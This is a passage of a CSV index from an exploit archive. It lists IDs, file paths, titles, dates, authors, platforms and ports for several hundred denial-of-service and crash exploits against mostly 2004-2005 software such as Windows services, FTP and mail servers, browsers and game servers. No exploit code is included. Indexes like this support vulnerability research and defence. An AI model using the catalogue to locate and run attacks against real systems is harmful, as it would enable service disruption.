bytes)",2004-07-23,Phuong,windows,dos, -366,exploits/windows/dos/366.pl,"Microsoft Windows SMS 2.0 - Denial of Service",2004-07-24,MacDefender,windows,dos, -370,exploits/linux/dos/370.c,"Citadel/UX - Remote Denial of Service (PoC)",2004-08-02,CoKi,linux,dos, -371,exploits/linux/dos/371.c,"Apache - Arbitrary Long HTTP Headers Denial of Service (C)",2004-08-02,anonymous,linux,dos, -376,exploits/windows/dos/376.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Null Pointer Crash",2004-08-04,anonymous,windows,dos, -383,exploits/multiple/dos/383.c,"psyBNC 2.3 - Denial of Service",2002-05-19,"Lunar Fault",multiple,dos,31337 -385,exploits/windows/dos/385.c,"Microsoft Messenger (Linux) - Denial of Service (MS03-043)",2004-08-08,VeNoMouS,windows,dos, -403,exploits/windows/dos/403.c,"IPD (Integrity Protection Driver) - Denial of Service",2004-08-18,anonymous,windows,dos, -419,exploits/windows/dos/419.pl,"BadBlue 2.52 Web Server - Multiple Connections Denial of Service Vulnerabilities",2004-08-26,"GulfTech Security",windows,dos, -420,exploits/win_x86/dos/420.java,"Bird Chat 1.61 - Denial of Service",2004-08-26,"Donato Ferrante",win_x86,dos, -422,exploits/windows/dos/422.c,"Painkiller 1.3.1 - Denial of Service",2004-08-27,"Luigi Auriemma",windows,dos, -423,exploits/windows/dos/423.pl,"Easy File Sharing Web Server 1.25 - Denial of Service",2004-08-27,"GulfTech Security",windows,dos, -427,exploits/windows/dos/427.c,"WFTPD Pro Server 3.21 - MLST Remote Denial of Service",2004-08-31,lion,windows,dos, -428,exploits/windows/dos/428.c,"CesarFTP Server - Long Command Denial of Service",2004-08-31,lion,windows,dos, -429,exploits/windows/dos/429.c,"Ground Control 1.0.0.7 - 'Server/Client' Denial of Service",2004-08-31,"Luigi Auriemma",windows,dos, -433,exploits/multiple/dos/433.c,"Call of Duty 1.4 - Denial of Service",2004-09-05,"Luigi Auriemma",multiple,dos, -463,exploits/windows/dos/463.c,"RhinoSoft Serv-U FTP Server < 5.2 - Remote Denial of Service",2004-09-13,str0ke,windows,dos, -468,exploits/windows/dos/468.c,"Pigeon Server 3.02.0143 - Denial of Service",2004-09-19,"Luigi Auriemma",windows,dos, -471,exploits/windows/dos/471.pl,"Emulive Server4 7560 - Remote Denial of Service",2004-09-21,"GulfTech Security",windows,dos,66 -474,exploits/windows/dos/474.sh,"Microsoft Windows - JPEG Processing Buffer Overrun (MS04-028)",2004-09-22,perplexy,windows,dos, -477,exploits/windows/dos/477.c,"PopMessenger 1.60 - Remote Denial of Service",2004-09-23,"Luigi Auriemma",windows,dos,8473 -551,exploits/linux/dos/551.c,"MyServer 0.7.1 - 'POST' Denial of Service",2004-09-27,"Tom Ferris",linux,dos, -562,exploits/windows/dos/562.c,"MSSQL 7.0 - Remote Denial of Service",2004-09-29,"securma massine",windows,dos, -571,exploits/windows/dos/571.c,"Monolith Games - Local Buffer Overflow",2004-10-10,"Luigi Auriemma",windows,dos, -578,exploits/windows/dos/578.pl,"Microsoft Windows NNTP Service (XPAT) - Denial of Service (MS04-036)",2004-10-16,"Lucas Lavarello",windows,dos, -585,exploits/windows/dos/585.pl,"Microsoft IIS - WebDAV XML Denial of Service (MS04-030)",2004-10-20,"Amit Klein",windows,dos, -593,exploits/windows/dos/593.pl,"Quick 'n EasY 2.4 FTP Server - Remote Denial of Service",2004-10-24,KaGra,windows,dos, -594,exploits/windows/dos/594.pl,"BaSoMail Server 1.24 - POP3/SMTP Remote Denial of Service",2004-10-24,KaGra,windows,dos, -599,exploits/windows/dos/599.py,"BaSoMail - Multiple Buffer Overflow Denial of Service Vulnerabilities",2004-10-26,muts,windows,dos, -603,exploits/windows/dos/603.c,"Master of Orion III 1.2.5 - Denial of Service",2004-10-27,"Luigi Auriemma",windows,dos, -604,exploits/windows/dos/604.c,"Age of Sail II 1.04.151 - Remote Buffer Overflow",2004-03-03,"Luigi Auriemma",windows,dos, -605,exploits/windows/dos/605.c,"Alpha Black Zero 1.04 - Remote Denial of Service",2004-03-03,"Luigi Auriemma",windows,dos, -606,exploits/windows/dos/606.c,"Chatman 1.5.1 RC1 - Broadcast Crash",2004-03-01,"Luigi Auriemma",windows,dos, -607,exploits/windows/dos/607.c,"Flash Messaging 5.2.0g - Remote Denial of Service",2004-03-02,"Luigi Auriemma",windows,dos, -611,exploits/windows/dos/611.c,"Chesapeake TFTP Server 1.0 - Directory Traversal / Denial of Service (PoC)",2004-11-01,"Luigi Auriemma",windows,dos, -625,exploits/windows/dos/625.pl,"WinFTP Server 1.6 - Denial of Service",2004-11-11,KaGra,windows,dos, -626,exploits/windows/dos/626.c,"Kerio Personal Firewall 4.1.1 - Multiple IP Options Denial of Service Vulnerabilities",2004-11-12,houseofdabus,windows,dos, -628,exploits/windows/dos/628.c,"NetNote Server 2.2 build 230 - Crafted String Denial of Service",2004-11-13,class101,windows,dos, -634,exploits/windows/dos/634.pl,"Secure Network Messenger 1.4.2 - Denial of Service",2004-11-15,ClearScreen,windows,dos, -649,exploits/windows/dos/649.c,"wodFtpDLX Client - ActiveX Control Buffer Overflow Crash",2004-11-22,Komrade,windows,dos, -651,exploits/windows/dos/651.c,"Halo 1.05 - Broadcast Client Crash",2004-11-22,"Luigi Auriemma",windows,dos, -653,exploits/windows/dos/653.c,"Soldier of Fortune II 1.3 Server/Client - Denial of Service",2004-11-23,"Luigi Auriemma",windows,dos, -655,exploits/windows/dos/655.c,"Star Wars Battlefront 1.1 - Fake Players Denial of Service",2004-11-24,"Luigi Auriemma",windows,dos, -662,exploits/windows/dos/662.pl,"3Dmax 6.x backburner Manager 2.2 - Denial of Service",2004-11-28,Xtiger,windows,dos, -664,exploits/windows/dos/664.c,"Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow",2004-11-29,NoPh0BiA,windows,dos, -665,exploits/windows/dos/665.c,"Orbz Game 2.10 - Remote Buffer Overflow",2004-11-29,"Luigi Auriemma",windows,dos, -667,exploits/windows/dos/667.c,"Jana Server 2.4.4 - 'http/pna' Denial of Service",2004-11-30,"Luigi Auriemma",windows,dos, -671,exploits/windows/dos/671.c,"Neverwinter Nights special - Fake Players Denial of Service",2004-12-01,"Luigi Auriemma",windows,dos, -672,exploits/windows/dos/672.c,"Kreed 1.05 - Format String / Denial of Service",2004-12-02,"Luigi Auriemma",windows,dos, -677,exploits/windows/dos/677.txt,"GetRight 5.2a - '.grs' Skin File Buffer Overflow",2004-12-06,ATmaCA,windows,dos, -679,exploits/windows/dos/679.c,"Battlefield 1942 1.6.19 + Vietnam 1.2 - Broadcast Client Crash",2004-12-07,"Luigi Auriemma",windows,dos, -682,exploits/windows/dos/682.c,"Codename Eagle 1.42 - Socket Unreacheable Denial of Service",2004-12-13,"Luigi Auriemma",windows,dos, -683,exploits/windows/dos/683.c,"Lithtech Engine (new protocol) - Socket Unreacheable Denial of Service",2004-12-13,"Luigi Auriemma",windows,dos, -685,exploits/linux/dos/685.c,"Linux Kernel 2.4.28/2.6.9 - 'scm_send Local' Denial of Service",2004-12-14,"Paul Starzetz",linux,dos, -686,exploits/linux/dos/686.c,"Linux Kernel 2.4.22-28/2.6.9 - 'igmp.c' Local Denial of Service",2004-12-14,"Paul Starzetz",linux,dos, -687,exploits/windows/dos/687.c,"OpenText FirstClass 8.0 - HTTP Daemon /Search Remote Denial of Service",2004-12-15,dila,windows,dos, -688,exploits/hardware/dos/688.c,"Ricoh Aficio 450/455 PCL 5e Printer - ICMP Denial of Service",2004-12-15,x90c,hardware,dos, -690,exploits/linux/dos/690.c,"Linux Kernel 2.4.28/2.6.9 - vc_resize int Local Overflow",2004-12-16,"Georgi Guninski",linux,dos, -691,exploits/linux/dos/691.c,"Linux Kernel 2.4.28/2.6.9 - Memory Leak Local Denial of Service",2004-12-16,"Georgi Guninski",linux,dos, -692,exploits/linux/dos/692.c,"Linux Kernel 2.4.28/2.6.9 - 'ip_options_get' Local Overflow",2004-12-16,"Georgi Guninski",linux,dos, -700,exploits/windows/dos/700.html,"Microsoft Internet Explorer / MSN - Memory_Access_Violation Denial of Service",2004-12-21,"Emmanouel Kellinis",windows,dos, -721,exploits/windows/dos/721.html,"Microsoft Windows Kernel - '.ANI' File Parsing Crash",2004-12-25,Flashsky,windows,dos, -736,exploits/windows/dos/736.c,"SOLDNER Secret Wars 30830 - Denial of Service",2005-01-04,"Luigi Auriemma",windows,dos,20000 -738,exploits/php/dos/738.c,"iWebNegar 1.1 - Configuration Nullification Denial of Service",2005-01-04,c0d3r,php,dos, -742,exploits/windows/dos/742.c,"Gore 1.50 - Socket Unreacheable Denial of Service",2005-01-06,"Luigi Auriemma",windows,dos, -743,exploits/windows/dos/743.html,"Norton AntiVirus < 2005 - Remote Stack Overflow",2005-01-06,"Rafel Ivgi",windows,dos, -755,exploits/windows/dos/755.c,"Breed patch #1 - Zero-Length Remote Crash",2005-01-13,"Luigi Auriemma",windows,dos,7649 -762,exploits/osx/dos/762.c,"Apple Mac OSX 10.3.7 - Input Validation Flaw 'parse_machfile()' Denial of Service",2005-01-20,nemo,osx,dos, -770,exploits/windows/dos/770.txt,"Apple QuickTime 6.5.2.10 - '.qtif' Image Parsing",2005-01-24,ATmaCA,windows,dos, -780,exploits/windows/dos/780.c,"Xpand Rally 1.0.0.0 (Server/Clients) - Crash",2005-01-31,"Luigi Auriemma",windows,dos,28015 -782,exploits/windows/dos/782.pl,"TinyWeb 1.9 - Denial of Service",2005-02-01,karak0rsan,windows,dos,80 -783,exploits/windows/dos/783.c,"Painkiller 1.35 - in-game cd-key alpha-numeric Buffer Overflow",2005-02-02,"Luigi Auriemma",windows,dos, -789,exploits/linux/dos/789.c,"ngIRCd 0.8.1 - Remote Denial of Service (2)",2005-02-05,CorryL,linux,dos,6667 -797,exploits/windows/dos/797.py,"Foxmail 2.0 - 'MAIL FROM:' Denial of Service",2005-02-07,OYXin,windows,dos, -799,exploits/osx/dos/799.c,"Apple Mac OSX - AppleFileServer Remote Denial of Service",2005-02-08,nemo,osx,dos, -810,exploits/windows/dos/810.c,"Armagetron Advanced 0.2.7.0 - Server Crash",2005-02-10,"Luigi Auriemma",windows,dos, -813,exploits/windows/dos/813.c,"Quake 3 Engine - Infostring Crash and Shutdown",2005-02-12,"Luigi Auriemma",windows,dos, -815,exploits/linux/dos/815.c,"CA BrightStor ARCserve Backup - Remote Buffer Overflow (PoC)",2005-02-12,cybertronic,linux,dos, -817,exploits/cgi/dos/817.pl,"AWStats 6.4 - Denial of Service",2005-02-14,GHC,cgi,dos, -838,exploits/multiple/dos/838.pl,"webconnect 6.4.4 < 6.5 - Directory Traversal / Denial of Service",2005-02-24,karak0rsan,multiple,dos, -841,exploits/windows/dos/841.c,"Soldier of Fortune 2 1.03 - 'cl_guid' Server Crash",2005-02-24,"Luigi Auriemma",windows,dos, -842,exploits/linux/dos/842.c,"WU-FTPD 2.6.2 - File Globbing Denial of Service",2005-02-25,str0ke,linux,dos, -843,exploits/windows/dos/843.c,"KNet Web Server 1.04c - Buffer Overflow Denial of Service",2005-02-25,CorryL,windows,dos, -849,exploits/windows/dos/849.c,"Scrapland 1.0 - Server Termination Denial of Service",2005-02-28,"Luigi Auriemma",windows,dos, -852,exploits/windows/dos/852.py,"Trillian Basic 3.0 - '.png' Image Processing Buffer Overflow",2005-03-02,"Tal Zeltzer",windows,dos, -855,exploits/multiple/dos/855.pl,"Apache 2.0.52 - GET Denial of Service",2005-03-04,GreenwooD,multiple,dos, -856,exploits/hardware/dos/856.c,"Nokia Symbian 60 - 'BlueTooth Nickname' Remote Restart (2)",2005-09-23,Qnix,hardware,dos, -861,exploits/windows/dos/861.c,"Microsoft Windows XP/2003 - Remote Denial of Service",2005-03-07,RusH,windows,dos, -867,exploits/multiple/dos/867.c,"Ethereal 0.10.9 - Denial of Service",2005-03-08,"Leon Juranic",multiple,dos, -869,exploits/bsd/dos/869.c,"OpenBSD 2.0 < 3.6 - TCP Timestamp Remote Denial of Service",2005-03-09,RusH,bsd,dos, -874,exploits/windows/dos/874.cpp,"Ethereal 0.10.9 (Windows) - '3G-A11' Remote Buffer Overflow",2005-03-12,"Leon Juranic",windows,dos, -880,exploits/multiple/dos/880.pl,"Freeciv Server 2.0.0beta8 - Denial of Service",2005-03-14,"Nico Spicher",multiple,dos, -882,exploits/windows/dos/882.cpp,"GoodTech Telnet Server < 5.0.7 - Buffer Overflow Crash",2005-03-15,Komrade,windows,dos, -886,exploits/windows/dos/886.pl,"PlatinumFTP 1.0.18 - Multiple Remote Denial of Service Vulnerabilities",2005-03-17,ports,windows,dos, -887,exploits/windows/dos/887.py,"MailEnable 1.8 - Remote Format String Denial of Service",2005-03-17,"Tal Zeltzer",windows,dos, -888,exploits/windows/dos/888.txt,"phpDEV5 - System-Call Local Denial of Service",2005-03-17,Ali7,windows,dos, -891,exploits/windows/dos/891.pl,"MCPWS Personal WebServer 1.3.21 - Denial of Service",2005-03-21,"Nico Spicher",windows,dos, -893,exploits/windows/dos/893.pl,"Ocean FTP Server 1.00 - Denial of Service",2005-03-21,"GSS IT",windows,dos, -899,exploits/windows/dos/899.pl,"SPECTral Personal SMTP Server 0.4.2 - Denial of Service",2005-03-28,GreenwooD,windows,dos, -904,exploits/linux/dos/904.c,"Linux Kernel 2.6.10 - Local Denial of Service",2005-03-29,ChoiX,linux,dos, -908,exploits/windows/dos/908.c,"ArGoSoft FTP Server 1.4.2.8 - Denial of Service",2005-04-03,c0d3r,windows,dos, -911,exploits/linux/dos/911.c,"Linux Kernel PPC64/IA64 (AIO) - Local Denial of Service",2005-04-04,"Daniel McNeil",linux,dos, -916,exploits/windows/dos/916.pl,"MailEnable Enterprise 1.x - SMTP Remote Denial of Service",2005-04-05,CorryL,windows,dos, -931,exploits/windows/dos/931.html,"Microsoft Internet Explorer - DHTML Object Handling (MS05-020)",2005-04-12,Skylined,windows,dos, -941,exploits/windows/dos/941.c,"Yager 5.24 - Multiple Denial of Service Vulnerabilities",2005-04-14,"Luigi Auriemma",windows,dos, -942,exploits/windows/dos/942.c,"Microsoft Windows - Malformed IP Options Denial of Service (MS05-019)",2005-04-17,"Yuri Gushin",windows,dos, -946,exploits/multiple/dos/946.c,"PostgreSQL 8.01 - Remote Reboot (Denial of Service)",2005-04-19,ChoiX,multiple,dos, -948,exploits/multiple/dos/948.c,"Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service (MS05-019)",2005-04-20,houseofdabus,multiple,dos, -956,exploits/multiple/dos/956.c,"Ethereal 0.10.10 / tcpdump 3.9.1 - 'rsvp_print' Infinite Loop Denial of Service",2005-04-26,vade79,multiple,dos, -957,exploits/linux/dos/957.c,"Tcpdump 3.8.x - 'ldp_print' Infinite Loop Denial of Service",2005-04-26,vade79,linux,dos, -958,exploits/linux/dos/958.c,"Tcpdump 3.8.x - 'rt_routing_info' Infinite Loop Denial of Service",2005-04-26,vade79,linux,dos, -959,exploits/linux/dos/959.c,"Tcpdump 3.8.x/3.9.1 - 'isis_print' Infinite Loop Denial of Service",2005-04-26,vade79,linux,dos, -978,exploits/windows/dos/978.cpp,"Ashley's Web Server - Denial of Service",2005-05-04,basher13,windows,dos, -983,exploits/windows/dos/983.cpp,"DataTrac Activity Console - Denial of Service",2005-05-06,basher13,windows,dos, -984,exploits/multiple/dos/984.c,"Ethereal 0.10.10 - 'dissect_ipc_state' Remote Denial of Service",2005-05-07,Nicob,multiple,dos, -40381,exploits/android/dos/40381.txt,"Google Android - getpidcon Usage binder Service Replacement Race Condition",2016-09-14,"Google Security Research",android,dos, -988,exploits/windows/dos/988.cpp,"Remote File Manager 1.0 - Denial of Service",2005-05-08,basher13,windows,dos, -998,exploits/linux/dos/998.c,"Linux Kernel 2.6.12-rc4 - 'ioctl_by_bdev' Local Denial of Service",2005-05-17,alert7,linux,dos, -999,exploits/linux/dos/999.c,"Gaim 1.2.1 - URL Handling Remote Stack Overflow",2005-05-17,Ron,linux,dos, -1000,exploits/windows/dos/1000.cpp,"Microsoft Windows XP/2003 - IPv6 Remote Denial of Service",2005-05-17,"Konrad Malewski",windows,dos, -1008,exploits/multiple/dos/1008.c,"TCP TIMESTAMPS - Denial of Service",2005-05-21,"Daniel Hartmeier",multiple,dos, -1024,exploits/windows/dos/1024.html,"Microsoft Internet Explorer - Multiple Stack Overflows Crashs",2005-05-31,"Benjamin Franz",windows,dos, -1025,exploits/windows/dos/1025.html,"Microsoft Internet Explorer - JavaScript 'window()' Crash",2005-05-31,"Benjamin Franz",windows,dos, -1027,exploits/windows/dos/1027.c,"FutureSoft TFTP Server 2000 - Remote Denial of Service",2005-06-02,ATmaCA,windows,dos, -1037,exploits/multiple/dos/1037.c,"Tcpdump - bgp_update_print Remote Denial of Service",2005-06-09,simon,multiple,dos, -1056,exploits/multiple/dos/1056.pl,"Apache 2.0.49 - Arbitrary Long HTTP Headers Denial of Service",2005-06-20,Qnix,multiple,dos, -1063,exploits/php/dos/1063.pl,"phpBB 2.0.15 - Register Multiple Users (Denial of Service) (Perl)",2005-06-22,g30rg3_x,php,dos, -1064,exploits/php/dos/1064.c,"phpBB 2.0.15 - Register Multiple Users (Denial of Service) (C)",2005-06-22,HaCkZaTaN,php,dos, -1065,exploits/windows/dos/1065.c,"Microsoft Windows - 'SMB' Transaction Response Handling (MS05-011)",2005-06-23,cybertronic,windows,dos, -1067,exploits/windows/dos/1067.cpp,"TCP-IP Datalook 1.3 - Local Denial of Service",2005-06-25,basher13,windows,dos, -1072,exploits/multiple/dos/1072.cpp,"Stream / Raped (Windows) - Denial of Service",2005-06-27,"Marco Del Percio",multiple,dos, -1090,exploits/windows/dos/1090.cpp,"TCP Chat (TCPX) 1.0 - Denial of Service",2005-07-06,basher13,windows,dos, -1093,exploits/windows/dos/1093.c,"PrivaShare 1.3 - Denial of Service",2005-07-07,basher13,windows,dos, -1094,exploits/windows/dos/1094.pl,"AnalogX SimpleServer:WWW 1.05 - Denial of Service",2005-07-07,Qnix,windows,dos, -1100,exploits/windows/dos/1100.pl,"Remote File Explorer 1.0 - Denial of Service",2005-07-11,basher13,windows,dos, -1101,exploits/windows/dos/1101.c,"SoftiaCom wMailServer 1.0 - Remote Denial of Service",2005-07-12,Kozan,windows,dos, -1104,exploits/windows/dos/1104.cpp,"Microsoft Windows - Netman Service Local Denial of Service",2005-07-14,bkbll,windows,dos, -1105,exploits/windows/dos/1105.c,"netPanzer 0.8 - Remote Denial of Service",2005-07-14,"Luigi Auriemma",windows,dos, -1107,exploits/windows/dos/1107.pl,"Remote Control Server 1.6.2 - Denial of Service",2005-07-15,basher13,windows,dos, -1109,exploits/windows/dos/1109.pl,"DzSoft PHP Editor 3.1.2.8 - Denial of Service",2005-07-15,basher13,windows,dos, -1110,exploits/windows/dos/1110.txt,"Microsoft Internet Explorer / MSN - ICC Profiles Crash (PoC)",2005-07-15,"Edward Gagnon",windows,dos, -1116,exploits/windows/dos/1116.c,"Microsoft Windows - Color Management Module Overflow (MS05-036) (1)",2005-07-21,snooq,windows,dos, -1121,exploits/windows/dos/1121.pl,"FTPshell Server 3.38 - Remote Denial of Service",2005-07-26,"Reed Arvin",windows,dos, -1126,exploits/windows/dos/1126.c,"BusinessMail Server 4.60.00 - Remote Denial of Service",2005-08-01,Kozan,windows,dos, -1127,exploits/windows/dos/1127.cpp,"ProRat Server 1.9 (Fix-2) - Buffer Overflow Crash",2005-08-01,"evil dabus",windows,dos, -1129,exploits/windows/dos/1129.c,"Quick 'n EasY 3.0 FTP Server - Remote Denial of Service",2005-08-02,Kozan,windows,dos, -1137,exploits/windows/dos/1137.pl,"Acunetix HTTP Sniffer - Denial of Service",2005-08-05,basher13,windows,dos, -1143,exploits/windows/dos/1143.sys,"Microsoft Windows XP SP2 - 'rdpwd.sys' Remote Kernel Denial of Service",2005-08-09,"Tom Ferris",windows,dos, -41796,exploits/multiple/dos/41796.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - 'bpf' Heap Overflow",2017-04-04,"Google Security Research",multiple,dos, -1153,exploits/hardware/dos/1153.pl,"Grandstream Budge Tone 101/102 VOIP Phone - Denial of Service",2005-08-12,"Pierre Kroma",hardware,dos, -1156,exploits/windows/dos/1156.c,"Chris Moneymakers World Poker Championship 1.0 - Denial of Service",2005-08-17,"Luigi Auriemma",windows,dos, -1157,exploits/cgi/dos/1157.pl,"GTChat 0.95 Alpha - Remote Denial of Service",2005-08-18,RusH,cgi,dos, -1158,exploits/windows/dos/1158.pl,"Ipswitch WS_FTP Server 5.03 - 'RNFR' Buffer Overflow",2004-11-29,"Reed Arvin",windows,dos, -1159,exploits/windows/dos/1159.pl,"Mercury/32 Mail Server 4.01a - 'check' Buffer Overflow",2004-12-01,"Reed Arvin",windows,dos, -1160,exploits/windows/dos/1160.pl,"Golden FTP Server Pro 2.52 - 'USER' Remote Buffer Overflow",2005-04-27,"Reed Arvin",windows,dos, -1162,exploits/windows/dos/1162.pl,"GoodTech SMTP Server 5.14 - Denial of Service",2005-06-07,"Reed Arvin",windows,dos, -1163,exploits/windows/dos/1163.pl,"IA eMailServer Corporate Edition 5.2.2 - Denial of Service",2005-06-26,"Reed Arvin",windows,dos, -1164,exploits/windows/dos/1164.pl,"BusinessMail Server 4.60.00 - Remote Buffer Overflow",2005-07-30,"Reed Arvin",windows,dos, -1165,exploits/windows/dos/1165.pl,"Inframail Advantage Server Edition 6.0 < 6.37 - 'SMTP' Buffer Overflow",2005-06-27,"Reed Arvin",windows,dos, -1166,exploits/windows/dos/1166.pl,"Inframail Advantage Server Edition 6.0 < 6.37 - 'FTP' Buffer Overflow",2005-06-27,"Reed Arvin",windows,dos, -1175,exploits/cgi/dos/1175.pl,"GTChat 0.95 Alpha - 'adduser' Remote Denial of Service",2005-08-23,VTECin5th,cgi,dos, -1176,exploits/multiple/dos/1176.c,"Ventrilo 2.3.0 (All Platforms) - Remote Denial of Service",2005-08-23,"Luigi Auriemma",multiple,dos, -1192,exploits/windows/dos/1192.cpp,"P2P Pro 1.0 - 'command' Denial of Service",2005-09-02,basher13,windows,dos, -1196,exploits/linux/dos/1196.c,"CUPS Server 1.1 - GET Denial of Service",2005-09-05,tracewar,linux,dos, -1199,exploits/windows/dos/1199.c,"BNBT BitTorrent EasyTracker 7.7r3 - Denial of Service",2005-09-06,Sowhat,windows,dos, -1204,exploits/multiple/dos/1204.html,"Mozilla Products - 'Host:' Buffer Overflow Denial of Service String",2005-09-09,"Tom Ferris",multiple,dos, -1212,exploits/windows/dos/1212.pl,"COOL! Remote Control 1.12 - Remote Denial of Service",2005-09-11,basher13,windows,dos, -1213,exploits/multiple/dos/1213.c,"Snort 2.4.0 - SACK TCP Option Error Handling Denial of Service",2005-09-12,nitr0us,multiple,dos, -1218,exploits/windows/dos/1218.c,"Stoney FTPd - 'rxBot mods ftpd' Denial of Service",2005-09-16,D-oNe,windows,dos, -1220,exploits/windows/dos/1220.pl,"Fastream NETFile Web Server 7.1.2 - 'HEAD' Denial of Service",2005-09-16,karak0rsan,windows,dos, -1222,exploits/windows/dos/1222.pl,"MCCS (Multi-Computer Control Systems) Command - Denial of Service",2005-09-19,basher13,windows,dos, -1233,exploits/multiple/dos/1233.html,"Mozilla Firefox 1.0.7 - Integer Overflow Denial of Service",2005-09-26,"Georgi Guninski",multiple,dos, -1235,exploits/windows/dos/1235.c,"MultiTheftAuto 0.5 patch 1 - Server Crash / MOTD Deletion",2005-09-26,"Luigi Auriemma",windows,dos, -1239,exploits/windows/dos/1239.c,"Virtools Web Player 3.0.0.100 - Buffer Overflow Denial of Service",2005-10-02,"Luigi Auriemma",windows,dos, -1246,exploits/windows/dos/1246.pl,"RBExplorer 1.0 - Hijacking Command Denial of Service",2005-10-11,basher13,windows,dos, -1251,exploits/windows/dos/1251.pl,"TYPSoft FTP Server 1.11 - 'RETR' Denial of Service",2005-10-14,wood,windows,dos, -1253,exploits/multiple/dos/1253.html,"Mozilla Firefox 1.0.7 / Thunderbird 1.0.6 - Denial of Service",2005-10-16,posidron,multiple,dos, -1254,exploits/multiple/dos/1254.html,"Opera 8.02 - Remote Denial of Service (1)",2005-10-16,posidron,multiple,dos, -1255,exploits/windows/dos/1255.html,"Opera 8.02 - Remote Denial of Service (2)",2005-10-16,posidron,windows,dos, -1256,exploits/multiple/dos/1256.pl,"Lynx 2.8.6dev.13 - Remote Buffer Overflow (PoC)",2005-10-17,"Ulf Harnhammar",multiple,dos, -1257,exploits/multiple/dos/1257.html,"Mozilla Firefox 1.0.7 (Mozilla 1.7.12) - Denial of Service",2005-10-17,Kubbo,multiple,dos, -1266,exploits/windows/dos/1266.py,"Ethereal 0.9.1 < 0.10.12 SLIMP3 - Remote Buffer Overflow (PoC)",2005-10-20,Sowhat,windows,dos, -1268,exploits/multiple/dos/1268.pl,"Net Portal Dynamic System 5.0 - Register Users Denial of Service",2005-10-21,DarkFig,multiple,dos, -1269,exploits/windows/dos/1269.c,"Microsoft Windows Plug-and-Play - 'Umpnpmgr.dll' Denial of Service (MS05-047) (1)",2005-10-21,anonymous,windows,dos, -1271,exploits/windows/dos/1271.c,"Microsoft Windows Plug-and-Play - 'Umpnpmgr.dll' Denial of Service (MS05-047) (2)",2005-10-24,"Winny Thomas",windows,dos, -1274,exploits/hardware/dos/1274.c,"Hasbani-WindWeb/2.0 - GET Remote Denial of Service",2005-10-27,Expanders,hardware,dos, -1276,exploits/windows/dos/1276.html,"Microsoft Internet Explorer 6 - 'mshtmled.dll' Denial of Service",2005-10-28,"Tom Ferris",windows,dos, -1281,exploits/windows/dos/1281.c,"Battle Carry .005 Socket Termination - Denial of Service",2005-11-02,"Luigi Auriemma",windows,dos, -1282,exploits/windows/dos/1282.c,"Blitzkrieg 2 < 1.21 - 'Server/Client' Denial of Service",2005-11-02,"Luigi Auriemma",windows,dos, -1283,exploits/windows/dos/1283.c,"FlatFrag 0.3 - Buffer Overflow / Denial of Service",2005-11-02,"Luigi Auriemma",windows,dos, -1284,exploits/windows/dos/1284.c,"Glider collectn kill 1.0.0.0 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos, -1285,exploits/windows/dos/1285.c,"Scorched 3D 39.1 - Multiple Vulnerabilities (PoC)",2005-11-02,"Luigi Auriemma",windows,dos, -1286,exploits/windows/dos/1286.c,"GO-Global Windows Clients 3.1.0.3270 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos, -1287,exploits/windows/dos/1287.c,"GO-Global Windows Server 3.1.0.3270 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos, -1327,exploits/windows/dos/1327.pl,"FTGate4 Groupware Mail Server 4.1 - imapd Remote Buffer Overflow (PoC)",2005-11-16,"Luca Ercoli",windows,dos, -1328,exploits/windows/dos/1328.c,"Microsoft Windows Server 2000 - UPNP 'getdevicelist' Memory Leak Denial of Service",2005-11-16,"Winny Thomas",windows,dos, -1331,exploits/multiple/dos/1331.c,"Macromedia Flash Plugin 7.0.19.0 - 'action' Denial of Service",2005-11-18,BassReFLeX,multiple,dos, -1336,exploits/windows/dos/1336.cpp,"FileZilla Server Terminal 0.9.4d - Buffer Overflow (PoC)",2005-11-21,"Inge Henriksen",windows,dos, -1338,exploits/hardware/dos/1338.pl,"Cisco PIX - Spoofed TCP SYN Packets Remote Denial of Service",2005-11-23,"Janis Vizulis",hardware,dos, -1339,exploits/windows/dos/1339.c,"freeFTPd 1.0.10 - 'PORT' Denial of Service",2005-11-24,"Stefan Lochbihler",windows,dos, -1341,exploits/windows/dos/1341.c,"Microsoft Windows - MSDTC Service Remote Memory Modification (PoC) (MS05-051)",2005-11-27,darkeagle,windows,dos, -1343,exploits/windows/dos/1343.c,"Microsoft Windows Metafile - 'gdi32.dll' Denial of Service (MS05-053)",2005-11-29,"Winny Thomas",windows,dos, -1345,exploits/php/dos/1345.php,"Xaraya 1.0.0 RC4 - 'create()' Denial of Service",2005-11-29,rgod,php,dos, -1346,exploits/windows/dos/1346.c,"Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)",2005-11-30,"Winny Thomas",windows,dos, -1353,exploits/windows/dos/1353.py,"WinEggDropShell 1.7 - Unauthenticated Multiple Remote Stack Overflows (PoC)",2005-12-02,Sowhat,windows,dos, -1362,exploits/windows/dos/1362.html,"Mozilla Firefox 1.5 - 'history.dat' Looping (PoC)",2005-12-07,ZIPLOCK,windows,dos, -1368,exploits/windows/dos/1368.cpp,"Counter Strike 2D 0.1.0.1 - Denial of Service",2005-12-11,"Iman Karim",windows,dos, -1371,exploits/windows/dos/1371.c,"Macromedia Flash Media Server 2 - Remote Denial of Service",2005-12-14,Kozan,windows,dos, -1372,exploits/windows/dos/1372.html,"Microsoft Internet Explorer 6 - PRE Tag Multiple Single Tags Denial of Service Vulnerabilities",2005-12-14,"Markus Heer",windows,dos, -1376,exploits/windows/dos/1376.c,"Microsoft IIS - HTTP Request Denial of Service (1)",2005-12-19,Kozan,windows,dos, -1377,exploits/windows/dos/1377.pl,"Microsoft IIS - HTTP Request Denial of Service (2)",2005-12-19,kokanin,windows,dos, -1389,exploits/windows/dos/1389.html,"Microsoft Internet Explorer 6 - 'mshtml.dll datasrc' Denial of Service",2005-12-27,BuHa,windows,dos, -1390,exploits/multiple/dos/1390.c,"BZFlag 2.0.4 - undelimited string Denial of Service",2005-12-27,"Luigi Auriemma",multiple,dos, -1394,exploits/windows/dos/1394.html,"Microsoft Internet Explorer 6 - 'mshtml.dll div' Denial of Service",2005-12-29,rgod,windows,dos, -1396,exploits/windows/dos/1396.cpp,"Microsoft IIS - HTTP Request Denial of Service",2005-12-29,Lympex,windows,dos, -1409,exploits/windows/dos/1409.pl,"BlueCoat WinProxy 6.0 R1c - GET Denial of 